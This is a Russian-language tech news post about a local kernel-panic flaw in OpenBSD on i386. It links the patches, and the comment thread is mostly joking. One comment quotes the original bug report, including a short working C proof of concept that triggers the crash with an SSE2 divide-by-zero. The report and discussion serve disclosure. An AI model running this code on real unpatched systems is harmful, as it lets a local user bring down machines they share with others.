LINUX.ORG.RU
НовостиБезопасность

Уязвимость в ядре OpenBSD

 , ,


0

0

Обнаружена опасная уязвимость в ядре OpenBSD.

На платформе i386 ядро неправильно обрабатывает исключения XMM. В результате локальный пользователь может вызвать kernel panic.

Ошибка исправлена в ветке -current, а также в патч-ветках OPENBSD_4_6, OPENBSD_4_5 и OPENBSD_4_4
Патч для OpenBSD 4.6: ftp://ftp.openbsd.org/pub/OpenBSD/pat...
Патч для OpenBSD 4.5: ftp://ftp.openbsd.org/pub/OpenBSD/pat...
Патч для OpenBSD 4.4: ftp://ftp.openbsd.org/pub/OpenBSD/pat...

Разработчики благодарят Slava Pestov за предоставление информации об уязвимости.

>>> Сообщение в списке рассылки security-announce

★★★★★

Проверено: maxcom ()
Исследователи из Уругвая разработали открытую технологию P2P трансляции видео через Интернет
HighLoad++: архитектура, базы данных, менеджмент, тестирование и железо
1 2

>Обнаружена опасная уязвимость

>локальный пользователь может вызвать kernel panic.

- папа а ей кто-то пользуется на десктопе?

- нет сынок, это фантастика.

sniper21 ★★★★★
()

Кто поможет OpenBSD? Слава Пестов, супергерой!

Слава Славе Пестову!

anonymous
()

решето же

anonymous
()

ололо, слава пестов это же аффтар jedit-а и factor-а, макоё^W любитель макинтоша, зачем ему ежебсд?

anonymous
()

(зв дверью слышен удар по лицу и крики "Работать! Безопасность, безопасность, безопасность! Безопасность, безопасность, безопасность! ...)

kost-bebix ★★
()

>Разработчики благодарят Slava Pestov

Это тот самый локальный пользователь, вызывающий "kernel panic" у опенка?

madcore ★★★★★
()

Как страшно жить.

anonymous
()
Ответ на: комментарий от welkome-to-lor

>delilen ты??? :))

нет) обозналися)

anonymous
()

вот оригинальное сообщение от Славы:

Hi,

Operating system version: 4.5
Architecture: i386

Save the following to 'test.c' and compile it with 'gcc -msse2
test.c', and run ./a.out:

-----
#include <xmmintrin.h>
#include <stdio.h>

int main()
{
      _MM_SET_EXCEPTION_MASK(_MM_GET_EXCEPTION_MASK() & ~(_MM_MASK_DIV_ZERO));
      double a = 1.0;
      double b = 0.0;
      __asm__("divsd %1, %0" : "+x" (a) : "x" (b));
      printf("%f\n",a);
      return 0;
}
-----

Expected result: process killed with SIGFPE.
Actual result: kernel panic.

что характерно, это работает только на i386, на amd64 все отрабатывается нормально.

val-amart ★★★★★
() автор топика
Ответ на: комментарий от kost-bebix

> (зв дверью слышен удар по лицу и крики "Работать! Безопасность, безопасность, безопасность! Безопасность, безопасность, безопасность! ...)

Shut up and hack! ?

val-amart ★★★★★
() автор топика
Ответ на: комментарий от ptah_alexs

> * В отдалении слышны звуки ударов -- разработчики благодарят Славу.

Дай-ка угадаю, чего они ему надавали за обнаружение уязвимости.

cascade
()

<p mode="fat">
Итак, OpenBSD вновь подтвердила свою репутацию самой безопасной операционной системы!
</p>

Те, кто действительно думает о безопасности, уже приказали заварить себя в сейф и забетонировать его в 20-метровой яме. Всем остальным придется смириться, что окружающий мир — РЕШЕТО!!1

nnz ★★★★
()
Ответ на: комментарий от madcore

>Это тот самый единственный пользователь опенка?
fxd

xorik ★★★★★
()

Спасибо Славе, что сделал опёнок ещё безопаснее!

Lumi ★★★★★
()

ЛОР иногда напоминают полигон по метанию какашек с надписью "РЕШЕТО!!!11", надо каску одевать

mikhalich ★★
()

Дващерики, изыдите!

anonymous
()

RIP решето, решето RIP
типа гангста рэп :)

frame ★★★
()

<вброс> Те, кто действительно думает о безопасности, уже приказали купить windows server 2008 для надёжного, централизованного управления </вброс>

Klizmoid
()

поздравляю OpenBSD'шников. Теперь у них одной багой меньше.

ЗЫ. не решето - это только helloworld, да и то смотря где.

k0l0b0k ★★
()
Ответ на: комментарий от nnz

> Те, кто действительно думает о безопасности, уже приказали заварить себя в сейф и забетонировать его в 20-метровой яме. Всем остальным придется смириться, что окружающий мир — РЕШЕТО!!1

Если честно, не очень убедительно. :)

Jayrome ★★★★★
()
Ответ на: комментарий от cascade

>> * В отдалении слышны звуки ударов -- разработчики благодарят Славу.

>Дай-ка угадаю, чего они ему надавали за обнаружение уязвимости.

Этим, ИМХО, легко объяснить малость числа дырок в openBSD: за каждую дырку разработчики бьют того, кто нашёл уязвимость, причём "количество битья" прямо пропорционально критичности уязвимости :-)

anonymo_use
()

Разработчиками OpenBSD была найдена уязвимость в голове Славы Пестова в виде сквозной дыры, через которую вытекало содержимое головы Славы Пестова.

mono ★★★★★
()
Ответ на: комментарий от anonymo_use

>Этим, ИМХО, легко объяснить малость числа дырок в openBSD: за каждую дырку разработчики бьют того, кто нашёл уязвимость, причём "количество битья" прямо пропорционально критичности уязвимости :-)

Т.к. писать идеальный код нереально, то в конечном счете останется только один — всех остальных забьют насмерть.

nnz ★★★★
()
Ответ на: комментарий от Jayrome

>Если честно, не очень убедительно. :)

Я не преследовал цели убедить некоего Jayrome.
Я лишь констатировал факты.

nnz ★★★★
()
Ответ на: комментарий от daemontux

Это некто Форман, выражающий взглядом своё неодобрение

frost_ii ★★★★★
()

!!!!!! ДУРШЛАГ !!!!!!!

anonymous
()

бздекапец?

anonymous
()

ааа-ха-ха! Бздуны опять пробзделись!!!!

anonymous
()
Ответ на: комментарий от nnz

Заговор разработчиков OpenBSD раскрыт!

Жена Ганса Рейзера пользовалась OpenBSD и случайно открыла жуткий баг. OpenBSD-developers ее выследили и таки замочили, подставив заодно Ганса, чтобы помалкивал и конкурентную систему не развивал.

robert_foster ★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
1 2
Исследователи из Уругвая разработали открытую технологию P2P трансляции видео через Интернет
Безопасность
HighLoad++: архитектура, базы данных, менеджмент, тестирование и железо